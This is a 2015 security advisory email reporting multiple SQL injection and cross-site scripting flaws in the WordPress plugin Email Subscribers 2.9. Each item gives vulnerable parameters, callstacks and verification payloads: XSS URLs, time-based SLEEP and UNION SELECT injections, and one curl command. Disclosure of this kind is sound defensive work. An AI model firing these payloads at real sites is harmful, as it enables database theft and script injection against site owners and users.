Subject: Multiple SQL injections and XSS in Email Subscribers 2.9
Date: Mon, 10 Aug 2015 16:15:43 +0200

Hello,

Plugin: Email Subscribers 2.9 https://wordpress.org/plugins/email-subscribers/


1. Cross-Site Scripting (XSS) (page=es-sendemail)

Authenticated administrators can inject arbitrary html/javascript code (there is no CSRF protection).

Method: POST/GET
Example url: http://localhost/wp-admin/admin.php?page=es-sendemail&search=[xss]
Vulnerable parameters: search (GET,POST), es_email_group (POST)

Example PHP callstack:
/email-subscribers/sendmail/sendmail.php:240

Verification:
http://localhost/wp-admin/admin.php?page=es-sendemail&search=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E


2. Cross-Site Scripting (XSS) (page=es-view-subscribers)

Authenticated administrators can inject arbitrary html/javascript code (there is no CSRF protection).

Method: GET
Example url: http://localhost/wp-admin/admin.php?page=es-view-subscribers&search=[xss]
Vulnerable parameters: search, sts, cnt

Example PHP callstack:
/email-subscribers/subscribers/view-subscriber-show.php:406

Verification:
http://localhost/wp-admin/admin.php?page=es-view-subscribers&search=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://localhost/wp-admin/admin.php?page=es-view-subscribers&sts=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://localhost/wp-admin/admin.php?page=es-view-subscribers&cnt=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E


3. SQL injection (es_view_subscriber_search())

Authenticated administrators can execute arbitrary sql commands (there is no CSRF protection).

Method: POST
Example url: http://localhost/wp-admin/admin.php?page=es-view-subscribers&did=[sqli]&ac=resend
Vulnerable parameter: did (GET)

Example PHP callstack:
/email-subscribers/subscribers/view-subscriber-show.php:75
es_cls_sendmail::es_prepare_optin   [/email-subscribers/classes/es-sendmail.php:15]
es_cls_dbquery::es_view_subscriber_search   [/email-subscribers/query/db_subscriber.php:35]
wpdb::get_results  

Another Example PHP callsttack:
/email-subscribers/subscribers/view-subscriber-edit.php:24
es_cls_dbquery::es_view_subscriber_search   [email-subscribers/query/db_subscriber.php:35]
wpdb::get_results


Verification:

curl --cookie "..." --data "frm_es_display=yes&frm_es_bulkaction=1" "http://localhost/wp-admin/admin.php?page=es-view-subscribers&did=1%20OR%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)%20--%20-&ac=resend"


4. SQL injection (es_notification_select())

Authenticated administrators can execute arbitrary sql commands (there is no CSRF protection). Attacker needs to know valid "did" id to exploit this vulnerability.

Method: GET
Url: http://localhost/wp-admin/admin.php?page=es-notification&ac=edit&did=[sqli]
Vulnerable parameter: did

Example PHP callstack:
email-subscribers/notification/notification-edit.php:19
es_cls_notification::es_notification_select   [email-subscribers/query/db_notification.php:14]
wpdb::get_row


Verification (did=1 is valid):
http://localhost/wp-admin/admin.php?page=es-notification&ac=edit&did=1+UNION+SELECT+9999999%2C1%2C0x53514c494e4a454354494f4e%2C1%2C1+order+by+es_note_id+desc+limit+1


5. SQL injection (es_template_select()) + XSS

Authenticated administrators can execute arbitrary sql commands (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin.php?page=es-compose&ac=preview&did=[sqli]
Vulnerable param: did

Callstack:
/email-subscribers/compose/compose-preview.php:20
es_cls_compose::es_template_select   [/email-subscribers/query/db_compose.php:14]
wpdb::get_row

Verification:
http://localhost/wp-admin/admin.php?page=es-compose&ac=preview&did=1+union+select+99999999%2C1%2C0x53514c494e4a454354494f4e%2C1%2C5+order+by+es_templ_id+desc+limit++1

http://localhost/wp-admin/admin.php?page=es-compose&ac=preview&did=1%20or%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)--%20-


Additionally the same parameter ("did") allows authenticated administrators to inject html/js code resulting in XSS vulnerability.

Callstack:
/email-subscribers/compose/compose-preview.php   [:29]

Verification: 
http://localhost/wp-admin/admin.php?page=es-compose&ac=preview&did=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E


6.  SQL injection (es_sentmail_select())

Authenticated administrators can execute arbitrary sql commands (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin.php?page=es-sentmail&ac=preview&did=[sqli]
Vulnerable param: did

Example PHP callstack:
/email-subscribers/sentmail/sentmail-preview.php:22
es_cls_sentmail::es_sentmail_select [/email-subscribers/query/db_sentmail.php:14]
wpdb::get_row

Verification:
http://localhost/wp-admin/admin.php?page=es-sentmail&ac=preview&did=1+UNION+SELECT+-1%2C2%2C3%2C4%2C5%2C6%2C7%2C0x53514c494e4a454354494f4e%2C9%2C10%2C11+order+by+es_sent_id+asc+limit+1%3B


7.  Cross-Site Scripting (XSS) (page=es-sentmail)

Authenticated administrators can inject arbitrary html/javascript code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin.php?page=es-sentmail&ac=preview&pagenum=[xss]
Vulnerable parameter: pagenum

Example PHP callstack:
/email-subscribers/sentmail/sentmail-preview.php:30

Verification:
http://localhost/wp-admin/admin.php?page=es-sentmail&ac=preview&pagenum=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E


--
Regards,
Marcin Probola,